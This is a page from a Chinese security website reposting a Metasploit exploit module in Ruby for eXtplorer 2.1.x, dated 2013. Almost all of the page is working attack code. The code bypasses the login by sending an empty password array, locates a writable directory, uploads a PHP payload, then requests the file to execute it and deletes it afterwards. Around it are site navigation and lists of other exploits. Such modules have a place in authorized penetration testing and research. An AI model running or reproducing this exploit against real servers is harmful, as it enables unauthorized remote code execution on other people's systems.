首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eXtplorer 2.1 Arbitrary File Upload
来源:metasploit.com 作者:Coles 发布时间:2013-01-10  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "eXtplorer v2.1 Arbitrary File Upload Vulnerability",
			'Description'    => %q{
				This module exploits an authentication bypass vulnerability in eXtplorer
				versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application.
				This application has an upload feature that allows an authenticated user
				with administrator roles to upload arbitrary files to any writable
				directory in the web root. This module uses an authentication bypass
				vulnerability to upload and execute a file.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
				],
			'References'     =>
				[
					[ 'OSVDB', '88751' ],
					[ 'BID', '57058' ],
					[ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ],
					[ 'URL', 'http://extplorer.net/issues/105' ]
				],
			'Payload'        =>
				{
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['Automatic Targeting', { 'auto' => true }]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 31 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/com_extplorer_2.1.0/']),
				OptString.new('USERNAME',  [true, 'The username for eXtplorer', 'admin'])
			], self.class)
	end

	def check

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		peer  = "#{rhost}:#{rport}"

		# retrieve software version from ./extplorer.xml
		begin
			res = send_request_cgi({
				'method' => 'GET',
				'uri'    => "#{base}extplorer.xml"
			})

			if !res or res.code != 200
				return Exploit::CheckCode::Safe
			end

			if res.body =~ /<version>2\.1\.(0RC\d|0|1|2)<\/version>/
				return Exploit::CheckCode::Vulnerable
			end

			if res.body =~ /eXtplorer/
				return Exploit::CheckCode::Safe
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("#{peer} - Connection failed")
		end
		return Exploit::CheckCode::Unknown

	end

	def on_new_session(client)
		if client.type == "meterpreter"
			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
			client.fs.file.rm("#{@fname}")
		else
			client.shell_command_token("rm #{@fname}")
		end
	end

	def upload(base, dir, fname, file)

		data = Rex::MIME::Message.new
		data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"")
		data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"")
		data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"")
		data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"")
		data.add_part("upload", nil, nil, "form-data; name=\"action\"")
		data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"")
		data.add_part("true", nil, nil, "form-data; name=\"confirm\"")

		data_post = data.to_s
		data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

		res = send_request_cgi({
			'method'  => 'POST',
			'uri'     => "#{base}index.php",
			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
			'data'    => data_post,
			'cookie'  => datastore['COOKIE'],
		})

		return res
	end

	def auth_bypass(base, user)

		res   = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{base}index.php",
			'data'   => "option=com_extplorer&action=login&type=extplorer&username=#{user}&password[]=",
			'cookie' => datastore['COOKIE'],
		})
		return res

	end

	def exploit

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		@peer = "#{rhost}:#{rport}"
		@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
		user  = datastore['USERNAME']
		datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"

		# bypass auth
		print_status("#{@peer} - Authenticating as user (#{user})")
		res   = auth_bypass(base, user)
		if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
			print_status("#{@peer} - Authenticated successfully")
		else
			fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
		end

		# search for writable directories
		print_status("#{@peer} - Retrieving writable subdirectories")
		begin
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{base}index.php",
				'cookie'  => datastore['COOKIE'],
				'data'    => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
			})
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end
		if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
			dir = "#{base}#{$1}"
			print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})")
		else
			dir = "#{base}"
			print_error("#{@peer} - Could not find a writable subdirectory.")
		end

		# upload PHP payload
		print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
		php = %Q|<?php #{payload.encoded} ?>|
		begin
			res = upload(base, dir, @fname, php)
			if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
				print_good("#{@peer} - File uploaded successfully")
			else
				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
			end
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end

		# search directories in the web root for the file
		print_status("#{@peer} - Searching directories for file (#{@fname})")
		begin
			res   = send_request_cgi({
				'method' => 'POST',
				'uri'    => "#{base}index.php",
				'data'   => "start=0&limit=10&option=com_extplorer&action=search&dir=#{base}&content=0&subdir=1&searchitem=#{@fname}",
				'cookie' => datastore['COOKIE'],
			})
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end
		if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
			dir = $1.gsub('\\','')
			print_good("#{@peer} - Successfully found file")
		else
			print_error("#{@peer} - Failed to find file")
		end

		# retrieve and execute PHP payload
		print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})")
		begin
			send_request_cgi({
				'method' => 'GET',
				'uri'    => "/#{dir}/#{@fname}"
			})
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end
		if res and res.code != 200
			print_error("#{@peer} - Executing payload failed")
		end
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nero MediaHome 4.5.8.0 Denial
·Microsoft Internet Explorer Op
·Samsung Kies 2.5.0.12114_1 Buf
·Honeywell Tema Remote Installe
·Colloquy 1.3.5 / 1.3.6 Denial
·Internet Explorer 8 Fixed Col
·Inmatrix Ltd. Zoom Player 8.5
·Ruby on Rails XML Processor YA
·Microsoft Lync 2012 Code Execu
·IBM Cognos tm1admsd.exe Overfl
·Java Applet JMX Remote Code Ex
·WordPress Google Document Embe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved